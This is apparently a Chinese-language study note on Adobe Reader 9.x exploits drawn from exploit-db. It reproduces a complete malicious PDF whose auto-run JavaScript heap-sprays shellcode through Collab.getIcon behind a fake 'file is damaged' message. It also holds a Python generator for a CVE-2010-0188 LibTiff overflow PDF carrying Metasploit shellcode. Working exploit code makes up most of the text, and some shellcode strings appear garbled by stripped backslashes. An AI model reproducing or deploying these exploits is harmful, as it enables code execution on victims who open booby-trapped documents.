学习来自于: exploit-db
1)
首先 ADOBE Reader AdbeRdr90_zh_CN 9.0
需要注意的是 OD调试时 选择不忽略异常(要不然就直接跑掉,就不叫调试了)
编写好POC OD调试
发现 需要构造特殊字符
接着可以看到 0xc0xc0xc0xc 被 shellcode 覆盖 执行了 shellcode
%PDF-1.1
1 0 obj
<<
/Type /Catalog
/Outlines 2 0 R
/Pages 3 0 R
/OpenAction 7 0 R
>>
endobj
2 0 obj
<<
/Type /Outlines
/Count 0
>>
endobj
3 0 obj
<<
/Type /Pages
/Kids [4 0 R]
/Count 1
>>
endobj
4 0 obj
<<
/Type /Page
/Parent 3 0 R
/MediaBox [0 0 612 792]
/Contents 5 0 R
/Resources <<
/ProcSet [/PDF /Text]
/Font << /F1 6 0 R >>
>>
>>
endobj
5 0 obj
<< /Length 98 >>
stream
BT /F1 12 Tf 100 700 Td 15 TL (Open File Error! Maybe the file is damaged!
) Tj ET
endstream
endobj
6 0 obj
<<
/Type /Font
/Subtype /Type1
/Name /F1
/BaseFont /Helvetica
/Encoding /MacRomanEncoding
>>
endobj
7 0 obj
<<
/Type /Action
/S /JavaScript
/JS (
var shellcode=unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a%ueb12%u5d86%u016a%u858d%u00b9%u0000%u6850%u8b31%u876f%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72%u006a%uff53%u63d5%u6c61%u0063");
var nops = unescape("%u9090%u9090");
while (nops.length < 0x100000)
nops += nops;
nops=nops.substring(0,0x100000/2-32/2-4/2-2/2-shellcode.length);
nops=nops+shellcode;
var memory = new Array();
for (var i=0;i<200;i++)
memory[i] += nops;
var str = unescape("%0c%0c%0c%0c");
while(str.length < 0x6000)
str += str;
app.doc.Collab.getIcon(str+'aaaaD.a');
)
>>
endobj
xref
0 8
0000000000 65535 f
0000000010 00000 n
0000000098 00000 n
0000000147 00000 n
0000000208 00000 n
0000000400 00000 n
0000000549 00000 n
0000000663 00000 n
trailer
<<
/Size 8
/Root 1 0 R
>>
startxref
1946
%%EOF
2)
ADOBE Reader
Version tested:
9.3.2
9.3.1
Adobe Systems Incorporated 直接崩溃
其中他的 c++代码 可以设置项目 不报waring 要不然很慢
http://www.exploit-db.com/exploits/14121/
3)
Version: <=8.3.0, <=9.3.0
__doc__='''
Title: Adobe PDF LibTiff Integer Overflow Code Execution.
Product: Adobe Acrobat Reader
Version: <=8.3.0, <=9.3.0
CVE: 2010-0188
Author: villy (villys777 at gmail.com)
Site: http://bugix-security.blogspot.com/
Tested : succesfully tested on Adobe Reader 9.1/9.2/9.3 OS Windows XP(SP2,SP3)
------------------------------------------------------------------------
'''
import sys
import base64
import struct
import zlib
import StringIO
SHELLCODE_OFFSET = 0x555
TIFF_OFSET=0x2038
# windows/exec - 227 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# EXITFUNC=process, CMD=calc.exe
buf ="xFCx68x6Ax0Ax38x1Ex68x63x89xD1x4Fx68x32x74x91x0C"
buf +="x8BxF4x8Dx7ExF4x33xDBxB7x04x2BxE3x66xBBx33x32x53"
buf +="x68x75x73x65x72x54x33xD2x64x8Bx5Ax30x8Bx4Bx0Cx8B"
buf +="x49x1Cx8Bx09x8Bx69x08xADx3Dx6Ax0Ax38x1Ex75x05x95"
buf +="xFFx57xF8x95x60x8Bx45x3Cx8Bx4Cx05x78x03xCDx8Bx59"
buf +="x20x03xDDx33xFFx47x8Bx34xBBx03xF5x99x0FxBEx06x3A"
buf +="xC4x74x08xC1xCAx07x03xD0x46xEBxF1x3Bx54x24x1Cx75"
buf +="xE4x8Bx59x24x03xDDx66x8Bx3Cx7Bx8Bx59x1Cx03xDDx03"
buf +="x2CxBBx95x5FxABx57x61x3Dx6Ax0Ax38x1Ex75xA9x33xDB"
buf +="x53"
buf +="x68x64x61x30x23"
buf +="x68x23x50x61x6E"
buf +="x8BxC4x53x50x50x53xFFx57xFCx53xFFx57xF8"
class CVE20100188Exploit:
def __init__(self,shellcode):
self.shellcode = shellcode
self.tiff64 = base64.b64encode(self.gen_tiff())
def gen_tiff(self):
tiff = 'x49x49x2ax00'
tiff += struct.pack("<L", TIFF_OFSET)
tiff += 'x90' * (SHELLCODE_OFFSET)
tiff += self.shellcode
tiff += 'x90' * (TIFF_OFSET - 8 - len(buf) - SHELLCODE_OFFSET)
tiff += "x07x00x00x01x03x00x01x00"
tiff += "x00x00x30x20x00x00x01x01x03x00x01x00x00x00x01x00"
tiff += "x00x00x03x01x03x00x01x00x00x00x01x00x00x00x06x01"
tiff += "x03x00x01x00x00x00x01x00x00x00x11x01x04x00x01x00"
tiff += "x00x00x08x00x00x00x17x01x04x00x01x00x00x00x30x20"
tiff += "x00x00x50x01x03x00xCCx00x00x00x92x20x00x00x00x00"
tiff += "x00x00x00x0Cx0Cx08x24x01x01x00xF7x72x00x07x04x01"
tiff += "x01x00xBBx15x00x07x00x10x00x00x4Dx15x00x07xBBx15"
tiff += "x00x07x00x03xFEx7FxB2x7Fx00x07xBBx15x00x07x11x00"
tiff += "x01x00xACxA8x00x07xBBx15x00x07x00x01x01x00xACxA8"
tiff += "x00x07xF7x72x00x07x11x00x01x00xE2x52x00x07x54x5C"
tiff += "x00x07xFFxFFxFFxFFx00x01x01x00x00x00x00x00x04x01"
tiff += "x01x00x00x10x00x00x40x00x00x00x31xD7x00x07xBBx15"
tiff += "x00x07x5Ax52x6Ax02x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07x58xCDx2Ex3Cx4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07x05x5Ax74xF4x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xB8x49x49x2Ax4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07x00x8BxFAxAFx4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07x75xEAx87xFEx4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xEBx0Ax5FxB9x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xE0x03x00x00x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xF3xA5xEBx09x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xE8xF1xFFxFFx4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xFFx90x90x90x4Dx15x00x07x22xA7x00x07xBBx15"
tiff += "x00x07xFFxFFxFFx90x4Dx15x00x07x31xD7x00x07x2Fx11"
tiff += "x00x07"
return tiff
def gen_xml(self):
xml= '''<?xml version="1.0" encoding="UTF-8" ?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/">
<present>
<pdf>
<version>1.65</version>
<interactive>1</interactive>
<linearized>1</linearized>
</pdf>
<xdp>
<packets>*</packets>
</xdp>
<destination>pdf</destination>
</present>
</config>
<template baseProfile="interactiveForms" xmlns="http://www.xfa.org/schema/xfa-template/2.4/">
<subform name="topmostSubform" layout="tb" locale="en_US">
<pageSet>
<pageArea id="PageArea1" name="PageArea1">
<contentArea name="ContentArea1" x="0pt" y="0pt" w="612pt" h="792pt" />
<medium short="612pt" long="792pt" stock="custom" />
</pageArea>
</pageSet>
<subform name="Page1" x="0pt" y="0pt" w="612pt" h="792pt">
<break before="pageArea" beforeTarget="#PageArea1" />
<bind match="none" />
<field name="ImageField1" w="28.575mm" h="1.39mm" x="37.883mm" y="29.25mm">
<ui>
<imageEdit />
</ui>
</field>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner expand 1?>
</subform>
<?templateDesigner FormTargetVersion 24?>
<?templateDesigner Rulers horizontal:1, vertical:1, guidelines:1, crosshairs:0?>
<?templateDesigner Zoom 94?>
</template>
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/">
<xfa:data>
<topmostSubform>
<ImageField1 xfa:contentType="image/tif" href="">'''+self.tiff64 +'''</ImageField1>
</topmostSubform>
</xfa:data>
</xfa:datasets>
<PDFSecurity xmlns="http://ns.adobe.com/xtd/" print="1" printHighQuality="1" change="1" modifyAnnots="1" formFieldFilling="1" documentAssembly="1" contentCopy="1" accessibleContent="1" metadata="1" />
<form checksum="a5Mpguasoj4WsTUtgpdudlf4qd4=" xmlns="http://www.xfa.org/schema/xfa-form/2.8/">
<subform name="topmostSubform">
<instanceManager name="_Page1" />
<subform name="Page1">
<field name="ImageField1" />
</subform>
<pageSet>
<pageArea name="PageArea1" />
</pageSet>
</subform>
</form>
</xdp:xdp>
'''
return xml
def gen_pdf(self):
xml = zlib.compress(self.gen_xml())
pdf='''%PDF-1.6
1 0 obj
<</Filter /FlateDecode/Length ''' + str(len(xml)) + '''/Type /EmbeddedFile>>
stream
''' + xml+'''
endstream
endobj
2 0 obj
<</V () /Kids [3 0 R] /T (topmostSubform[0]) >>
endobj
3 0 obj
<</Parent 2 0 R /Kids [4 0 R] /T (Page1[0])>>
endobj
4 0 obj
<</MK <</IF <</A [0.0 1.0]>>/TP 1>>/P 5 0 R/FT /Btn/TU (ImageField1)/Ff 65536/Parent 3 0 R/F 4/DA (/CourierStd 10 Tf 0 g)/Subtype /Widget/Type /Annot/T (ImageField1[0])/Rect [107.385 705.147 188.385 709.087]>>
endobj
5 0 obj
<</Rotate 0 /CropBox [0.0 0.0 612.0 792.0]/MediaBox [0.0 0.0 612.0 792.0]/Resources <</XObject >>/Parent 6 0 R/Type /Page/PieceInfo null>>
endobj
6 0 obj
<</Kids [5 0 R]/Type /Pages/Count 1>>
endobj
7 0 obj
<</PageMode /UseAttachments/Pages 6 0 R/MarkInfo <</Marked true>>/Lang (en-us)/AcroForm 8 0 R/Type /Catalog>>
endobj
8 0 obj
<</DA (/Helv 0 Tf 0 g )/XFA [(template) 1 0 R]/Fields [2 0 R]>>
endobj xref
trailer
<</Root 7 0 R/Size 9>>
startxref
14765
%%EOF'''
return pdf
if __name__=="__main__":
print __doc__
if len(sys.argv) != 2:
print "Usage: %s [output.pdf]" % sys.argv[0]
print "Creating Exploit to %s
"% sys.argv[1]
exploit=CVE20100188Exploit(buf)
f = open(sys.argv[1],mode='wb')
f.write(exploit.gen_pdf())
f.close()
print "[+] done !"